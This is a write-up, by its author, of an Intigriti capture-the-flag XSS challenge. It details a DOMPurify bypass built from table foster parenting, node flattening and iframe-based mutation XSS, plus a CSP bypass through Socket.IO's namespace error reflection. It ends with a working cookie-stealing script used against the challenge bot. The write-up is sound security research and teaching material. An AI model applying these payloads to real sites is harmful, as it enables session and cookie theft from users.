This month, I authored a difficult XSS challenge for Intigriti, ending up with only a few impressive solves. While exploring rabbit holes in another challenge, the idea for this one occurred to me, and I eventually got it to work after a lot of trial and error. That made for a fun Mutation XSS technique, combined with another more practical one to bypass CSPs using a powerful Socket.IO gadget.
You can still play the challenge at challenge-0725.intigriti.io before I spoil the solution. If you're just here to learn the techniques, here's a breakdown.

Summary:

  1. Notice DOMPurify allows id= attributes to DOM Clobber document.getElementById(...) calls, but only if the injected element comes before the original one. Our input gets injected into a <div id="chat-messages"> normally.
  2. By nesting many <table> elements, node flattening is reached after 512 elements, and an element <iframe> can be put where it isn't supposed to. After the reparse, the iframe gets moved out, above the table, allowing it to clobber id="chat-messages".
  3. Sending a second message now writes into the iframe's children, which are not escaped on serialization. Because it is a raw text element, it can be closed by <a id="</iframe>"> to allow Mutation XSS.
  4. Bypass the CSP using the Socket.IO polling endpoint, by sending a request for an invalid namespace that reflects the name in valid JavaScript syntax (44/alert(origin),{"message":"Invalid namespace"}). 💥

The Challenge

Upon first visiting the challenge page, we see a login screen that asks for a username to start a chat. In the bottom-right corner, there is also a button to download the challenge's source code:

Login screen asking for username, and a source code download button
Login screen asking for username, and a source code download button

We can download the source, unzip it, and then use docker compose up --build to start it locally. After that, it will be available on http://localhost:3000 for testing.

Entering a username, we get redirected to a random /chat/:uuid URL and see a chat interface:

Chat window with a join message and "Hello, world!"
Chat window with a join message and "Hello, world!"

Multiple users can join this to interact, and there is an Invite Bot button, which is the bot that we need to XSS to get the flag. We can see this in the code (app/index.js):

import bot from './bot.js';
...
app.get('/bot', (req, res) => {
  // Add captcha to the bot page (not related to challenge)
  ...
  res.send(html);
});
app.post('/bot', bot);

The GET endpoint shows a simple interface for passing a channel ID (the UUID in the URL), and sends a POST request to trigger the bot (app/bot.js):

import puppeteer from 'puppeteer';

export default async function handler(req, res) {
  const { channel, 'g-recaptcha-response': grecaptchaResponse } = req.body;
  ...
  res.on('finish', async () => {
    // Runs after the response is sent
    ...
    await context.setCookie({
      name: "flag",
      value: process.env.FLAG,
      domain: HOST.replace(/https?:\/\//, "")
    });
    ...
    // Login
    await page.evaluateOnNewDocument(() => {
      localStorage.setItem('username', "bot");
    });

    // Visit chat
    await sleep(1_000);
    const url = HOST + `/chat/${channel}`;
    console.log(`[BOT] Visiting ${url}...`);
    await page.goto(url);
    await page.waitForSelector("#message-form");
    // Send a message in the chat
    await sleep(1_000);
    await page.type("#message-form input[name='message']", "Beep boop 🤖... Hello everyone!");
    await page.click("#message-form button[type='submit']");
    ...
  });
  
  // Redirect user back to chat, so they can see the bot
  res.redirect(`/chat/${channel}`);
}

The bot enters the chat and sends a message, then sits there for 10 seconds before leaving. Somehow, during this time, we need to trigger an XSS on them to leak the flag stored in their flag= cookie.

The messaging is implemented using Socket.IO with a channel for each chat on the server-side. Apart from that, there are no dynamic endpoints, everything returns static HTML (app/index.js) and a consistent list of security headers using middleware:

const app = express();
app.use(express.static('public'));

app.use(function (req, res, next) {
  res.setHeader(
    "Content-Security-Policy",
    `default-src 'self'; script-src 'self'; style-src 'self' 'unsafe-inline'; base-uri 'none'; frame-src 'none'; form-action 'self'`
  );
  res.setHeader("X-Content-Type-Options", "nosniff");
  res.setHeader("X-Frame-Options", "DENY");

  next();
});

app.get('/', (req, res) => res.redirect('/login'));
app.get('/login', (req, res) => res.sendFile(path.resolve('public/login.html')));
app.get('/chat/:id', (req, res) => res.sendFile(path.resolve('public/chat.html')));
...
io.on('connection', (socket) => {
  ...

For XSS, we should focus on the client-side, especially JavaScript, to figure out how malicious scripts may be executed. The chat involves quite a bit of logic. Upon loading the page, we join the channel using Socket.IO and can send messages by submitting a form (app/public/chat.js):

const socket = io();

socket.emit("join_channel", { channelId, username });

// Send message
document.addEventListener("submit", (e) => {
  if (e.target.id !== "message-form") return;
  e.preventDefault();

  const messageInput = e.target.message;
  const message = messageInput.value.trim();
  if (message) {
    socket.emit("send_message", message);
    messageInput.value = "";
    messageInput.setAttribute("value", "");
  }
});

The server handles this with the following function (app/index.js):

socket.on('send_message', errorHandler((message) => {
  if (!currentChannel) return;

  console.log(`${currentChannel} - ${currentUser.username}: ${message}`);

  io.to(currentChannel).emit('message', {
    type: 'user',
    username: currentUser.username,
    color: currentUser.color,
    text: message,
    timestamp: new Date().toISOString()
  });
}));

Simply relaying the message to everyone connected to the channel. They receive it in the following handler (app/public/chat.js):

// Receive messages
socket.on("message", (message) => {
  const messageElement = document.createElement("div");
  messageElement.className = "message";

  // timestamp
  const timeSpan = document.createElement("span");
  timeSpan.className = "timestamp";
  timeSpan.textContent = new Date(message.timestamp).toLocaleTimeString([], { hour: "2-digit", minute: "2-digit" });
  messageElement.appendChild(timeSpan);
  // username
  if (message.username) {
    const usernameSpan = document.createElement("span");
    usernameSpan.className = "username";
    usernameSpan.textContent = message.username;
    usernameSpan.style.color = `hsl(${message.color}deg, 100%, 50%)`;
    messageElement.appendChild(usernameSpan);
  }
  // message text
  const textSpan = document.createElement("span");
  textSpan.appendChild(DOMPurify.sanitize(message.text, { RETURN_DOM_FRAGMENT: true, ADD_TAGS: ["iframe"] }));
  messageElement.appendChild(textSpan);

  const chatMessages = document.getElementById("chat-messages");
  chatMessages.appendChild(messageElement);
  chatMessages.scrollTop = chatMessages.scrollHeight;
  document.body.innerHTML = document.body.innerHTML;
});

It creates a timestamp, a username, and a message text element. The latter is much more interesting than the rest because it parses our message.text as HTML using DOMPurify.
Another thing of note is the line all the way at the bottom, document.body.innerHTML = document.body.innerHTML. While assigning a property to itself may look like it does nothing, in this case, reading and assigning to the .innerHTML will first serialize and then reparse the DOM, known as a "round-trip". This is interesting in the case of HTML because, as the specification warns, the tree before and after a round trip may be different! (spec)

Warning stating that a parsing roundtrip may return different tree structure
Warning stating that a parsing roundtrip may return different tree structure

DOM Clobbering

One attack that HTML sanitizers can hardly protect against is DOM Clobbering. It makes use of the strange feature in JavaScript where HTML elements are accessible via a shorthand by their id= attribute on the window object. For example, an element like <img id="something"> will be accessible via the global variable something. Such gadgets are not in this application, though, but a more direct one is.

There are many uses of document.getElementById(...), which essentially does the same. DOMPurify won't sanitize id= attributes, so we can try to hijack any of the elements the page looks for. One interesting target is chat-messages, because our HTML gets inserted into it every time a message is received. If we can override it with some obscure element that has special parsing rules, we may be able to do something similar to what @kevin_mizu presented here.

Before going there, we still need to make DOM Clobbering work. We can try to inject <svg id="chat-messages">, which will be allowed, but isn't instantly useful to overwrite document.getElementById("chat-messages"):

DevTools showing two elements with the same ID, but only first is returned
DevTools showing two elements with the same ID, but only first is returned

The problem is that it always returns the first element found in the tree, which can never be our input because our input is necessarily inside of the real chat messages, so it must come after it as a child. We either need to give up on this idea, or find a way to write our element somewhere before the regular chat messages element.

In previous Mutation XSS related writeups, a feature caught my attention. It's called "foster parenting" and is unique to <table> elements. What it does is move invalid elements in a table above it, for example:

<table id="1">
  <div id="2">Hello, world!</div>
</table>

Turns into:

<div id="2">Hello, world!</div>
<table id="1">
</table>

The elements are suddenly re-ordered, which sounds useful for solving our problem. If we can just write an invalid element while the parser is in the "in-table" insertion mode, it should pop the element out somewhere higher, earlier in the DOM. It just so happens (😉) that the chat.html page is wrapped in a table layout like this:

<!DOCTYPE html>
<html lang="en">
  ...
  <body>
    <div class="container">
      <table>
        <tr>
          <td class="header" colspan="2">Instant Realtime Communication</td>
        </tr>
        <tr>
          ...
          <td>
            <div id="chat-messages" class="chat-area"></div>
          </td>
        </tr>
        ...
      </table>
    </div>
  </body>
</html>

Creating an invalid element inside the <div id="chat-messages"> may pop it out above the top-most <table>, which will then be first in the DOM, and allow us to clobber chat-messages!

Creating an invalid element like this is easier said than done. Because our input is inside a <td> tag, it switches to the "in cell" insertion mode. From here, whatever tag we start has two possible options:

Starting with caption or similar tags closes the cell, anything else parsed as "in body"
Starting with caption or similar tags closes the cell, anything else parsed as "in body"

The "Anything else" case is just parsing as a regular body, there is no chance to trigger foster parenting there. We need to get back to the table. It looks like <caption>, <col> and similar tags might allow this though, we can try (Dom-Explorer):

<table><tr><td><col><div id="clobbered">
<div id="clobbered"></div>
<table>
  <tbody>
    <tr>
      <td></td>
    </tr>
  </tbody>
  <colgroup>
    <col>
  </colgroup>
</table>

This looks good! Would <col><div id="clobbered"> pass DOMPurify? The source code says it should, but when trying to do so, it still gets sanitized:

DOMPurify.sanitize('<col><div id="clobbered">')
// '<div id="clobbered"></div>'

Looking further, even without sanitizing it gets removed when using DOMParser.parseFromString():

new DOMParser().parseFromString('<col><div id="clobbered">', "text/html").body.innerHTML
// '<div id="clobbered"></div>'

Is the browser sanitizing this by itself?! No, this happens because <col> is not valid in the body context that it starts in:

"col" element is ignored in body
"col" element is ignored in body

Unfortunately, this overlaps with all alternative elements we found to escape the <td>, these are ignored while parsing the body and not in a table. We can't escape the <td> because all elements that would allow it aren't allowed directly in the <body>.

Node flattening

At this point, you may be thinking about nested tables and how the parsing would interact there. Maybe it's possible to make some combination of elements allowed in the "in body" insertion mode, so that DOMPurify can let it through. When the browser inserts it into the DOM, it won't be valid in the body to foster parent our injected element to the top of the table.

Another good idea for creating weird situations is a trick semi-recently discovered by @IcesFont which triggered a chain reaction of many DOMPurify bypasses in a short time. The trick utilizes "node flattening", where the browser will limit how deeply nested elements may be. Simply said, it will stop nesting the elements after 512 levels:

<body><div*513>
<body>
  <div>
    <div*508>
      <div>
        <div>
        <div>  <-- Notice these don't go deeper
        <div>

The important fact here is that during serialization, the deeper elements also aren't nested anymore; in the above example, it will end up with 3 self-closing <div> tags. Remember the document.body.innerHTML = document.body.innerHTML operation we noticed? It causes a round-trip, which is serialization and reparsing. We can create a DOM tree that's parsed as a lot of nested elements and inserted into the DOM as such. During serialization, the deepest nested elements are flattened, causing them to get into situations that may normally be impossible. The parsing will then have to deal with that and potentially cause mutations.

For this challenge, we can make an example with a table deeply nested to the limit. Once flattened and reparsed, the result is very interesting (Dom-Explorer):

Roundtrip causes clobbered element to jump up during the second parsing
Roundtrip causes clobbered element to jump up during the second parsing

The first DomParser represents what DOMPurify sees (minus the <table><tr><td> prefix), everything is deeply nested but still inside the root table. However, the second DomParser is what the DOM looks like after a round trip, the <div id="chat-messages"> has moved up above the topmost <table>. This is because after the first parsing, node flattening pushed it out of its <td>. It is now directly inside the <tbody>, which isn't allowed, so foster parenting moves it up above the table. Because it has now moved above the real chat-messages, we should have clobbered the element, and any future messages will be inserted into it!

socket.emit("send_message", '<div>'.repeat(510) + '<table><tr><td><div id="chat-messages">')

2nd message shows up outside of table in clobbered chat messages element
2nd message shows up outside of table in clobbered chat messages element

Mutation XSS

Now back to our original plan, what if we made the clobbered element a special one like <svg>, then use the following payload, which worked in DOMPurify 3.0.6:

a<style><!--</style><a id="--!><img src=x onerror=alert()>"></a>

Unfortunately, the above payload doesn't make it through the latest version anymore (Dom-Explorer):

a<a></a>

Both the <style> and the <a> tag's id= attribute were removed. The first is due to this check (/<[/\w!]/g), which removes any elements without children that still contain HTML tags, such as our <style> tag. The second is due to this other check (/((--!?|])>)|<\/(style|title)/i) that sanitizes attributes containing closing comments, style, and title tags. These checks are to harden against some known namespace confusion attacks and make it much harder to achieve a bypass.

Still, we have a pretty powerful primitive on our hands. We are able to target DOMPurify's output into any element we want. Instead of stopping at <svg>, why not directly insert into a <style> tag? Then DOMPurify will try to sanitize it as HTML, but it's inserted as CSS. These are very different contexts. We could write something like <a id="</style><img src onerror=alert()>">, for example, which DOMPurify will see as just an <a> tag with an attribute, while surrounded with a style tag it closes upon seeing </style> and then back in HTML, triggers XSS with the image.

Unfortunately this hits the extra attribute check from DOMPurify again... What other tags similar to <style> are there that serialize their contents without escaping them, and parse as text? This is actually a pretty well-defined selection:

List of text tags that are not escaped on serialization
List of text tags that are not escaped on serialization

We get to choose between style, script, xmp, iframe, noembed, noframes, or plaintext. Of these, only style is allowed by default. But the configuration we're dealing with has an exception:

DOMPurify.sanitize(message.text, { RETURN_DOM_FRAGMENT: true, ADD_TAGS: ["iframe"] })

We're allowed <iframe> tags, and the best thing, a closing </iframe> tag is allowed in attributes by the DOMPurify regular expression! This means our solution will be to use DOM Clobbering to create an <iframe id="chat-message">, for us to write a 2nd message that will write into there the content: <a id="</iframe><img src onerror=alert(origin)>">. After the round-trip, this should interpret the image as a real HTML tag and trigger the XSS. Let's try it:

socket.emit("send_message", '<div>'.repeat(510) + '<table><tr><td><iframe id="chat-messages">')
socket.emit("send_message", '<a id="</iframe><img src onerror=alert(origin)>">')

Image injected with two messages, but fails due to CSP
Image injected with two messages, but fails due to CSP

Success! Well... kind of. We successfully injected our XSS payload, but it doesn't trigger yet because of a CSP. What is it defined as?

Content-Security-Policy: default-src 'self'; script-src 'self'; style-src 'self' 'unsafe-inline'; base-uri 'none'; frame-src 'none'; form-action 'self'

Alright, no obvious bypasses yet, we'll have to investigate this a little further before we see our shiny alert.

CSP Bypass using Socket.IO

script-src 'self' is most important to us, because at some point we want to run scripts. The rule means we may only load scripts from the current host, so any relative paths. There aren't many in this challenge because all endpoints only return static HTML, JS, or CSS files. But we can see one creeping around in our Network tab:

socket.io polling requests DevTools Network tab
socket.io polling requests DevTools Network tab

This Socket.IO endpoint with ?transport=polling returns some weirdly formatted data in Content-Type: text/plain. It's a simple GET request with a special URL. Is there a chance we could use such a response containing arbitrary JavaScript to bypass the CSP? You might quickly say no because the /chat/:uuid endpoint responds with:

X-Content-Type-Options: nosniff

But it is important to understand that this header only applies to the request it is set on, not the whole document. These SocketIO responses don't have X-Content-Type-Options: so by default they are allowed to be loaded as any content type, including JavaScript. But can we really make this weird custom protocol return valid JavaScript to perform our flag exfiltration?

We already see examples where part of our input, the messages, are returned in the response. But the problem is that these are always correctly JSON-formatted coming from the server. Still, they happen to be valid JavaScript, promising if we're able to find variations of this.

> 42["message",{"type":"system","text":"<i style=\"color: #7f8c8d\"><span style=\"color: hsl(48deg, 100%, 50%)\">Jorian</span> has joined the channel</i>","timestamp":"2025-05-16T18:43:59.337Z"}]
< undefined

https://socket.io/intigriti_xss_0725_v4/socket-io-protocol/

We can read the above protocol description to learn about all the different things it can output. One example stands out:

With a custom namespace:
Packet: { type: EVENT, namespace: "/admin", data: ["bar"] }
Encoded: 2/admin,["bar"]

If we were to run this in JavaScript, it would try to resolve the admin variable. We can replace it with alert() later:

> 2/admin,["bar"]
< Uncaught ReferenceError: admin is not defined

But this is a packet from the client, we need one that the server sends to us as a response. Let's try to forge the above packet anyway and see what the server does with it:

io("/alert()", {transports: ["polling"]}).emit("test")

The error in the response is... wait...

44/alert(),{"message":"Invalid namespace"}

The error message is valid JavaScript, including our namespace input! All we have to do now is prepare such a URL without requesting it ourselves, as that would delete the response. Polling works like this:

  1. Request a new session ID
  2. Start a GET request that won't get a response yet
  3. Send a POST request with your message
  4. Finally, the GET request from step 2 gets resolved to the result from step 3

So we simply need to do steps 1 and 3 on our side, then craft the URL one would normally request for step 2 and give it to the victim, so that step 4 happens inside their browser during the XSS. It should return our prepared content and execute some JavaScript payload.

Half-following the protocol like this isn't possible with the official Socket.IO API, so we'll have to go a bit more manually using raw fetch() requests inspired by what we see in the Network tab going back and forth:

// Step 1 (request session ID)
res = await fetch("/socket.io/?" + new URLSearchParams({EIO: 4, transport: "polling"})).then(r => r.text());
sid = JSON.parse(res.slice(1))["sid"];
// Step 3 (send POST message)
await fetch("/socket.io/?" + new URLSearchParams({EIO: 4, transport: "polling", sid}), {
    method: "POST",
    body: "40/alert(origin),"
});
// Step 2 (craft URL for response)
url = "/socket.io/?" + new URLSearchParams({EIO: 4, transport: "polling", sid});
console.log(url);

This prints a URL that, when viewed in the browser, responds with:

44/alert(origin),{"message":"Invalid namespace"}

We now need to put this into a <script src="..."> using our Mutation XSS, to get it to bypass the CSP. Because our sink of .innerHTML doesn't execute script tags, we need to wrap it in an <iframe srcdoc="...">, which creates a new document that does load script tags. This is no problem for us at this point, because we've completely bypassed the sanitizer.

The JavaScript snippet below will trigger the XSS via the received messages:

socket.emit("send_message", '<div>'.repeat(510) + '<table><tr><td><iframe id="chat-messages">')
socket.emit("send_message", `<a id="</iframe><iframe srcdoc='<script/src=${url}></script>'>">`)

Successful alert on ourselves by running JavaScript in Console
Successful alert on ourselves by running JavaScript in Console

The final goal is to steal the flag= cookie from the Bot. We can invite it to our chat, and then send the above messages again to trigger XSS on it and exfiltrate the cookies. All that's left to do is update the POST body to use a flag-stealing payload like reading document.cookie and sending it as a message back to us.

body: "40/(top.document.querySelector('form input').value=document.cookie)-top.document.querySelector('form button').click(),"

Then, sending it over the chat right after we invite the bot to it, making sure not to XSS ourselves at this point, as it would invalidate the polling URL. This can simply be done by overwriting some function like DOMPurify.sanitize = console.log;.

// Run this when the bot joins right after pressing *Invite Bot*
DOMPurify.sanitize = console.log;  // Prevent XSS'ing ourselves, but still see response messages
res = await fetch("/socket.io/?" + new URLSearchParams({EIO: 4, transport: "polling"})).then(r => r.text());
sid = JSON.parse(res.slice(1))["sid"];
await fetch("/socket.io/?" + new URLSearchParams({EIO: 4, transport: "polling", sid}), {
    method: "POST",
    body: "40/(top.document.querySelector('form input').value=document.cookie)-top.document.querySelector('form button').click(),"
});
url = "/socket.io/?" + new URLSearchParams({EIO: 4, transport: "polling", sid});
socket.emit("send_message", '<div>'.repeat(510) + '<table><tr><td><iframe id="chat-messages">')
socket.emit("send_message", `<a id="</iframe><iframe srcdoc='<script/src=${url}></script>'>">`)

If timed correctly, we quickly receive a message back from the bot containing the flag! flag=CTF{st4Ck1Ng_T4Bl3S_'t1Ll_1T_C0M3S_Cr4Sh1Ng_D0Wn,_S0Ck3T10_1S_Such_4_Gr34T_G4Dg3T!}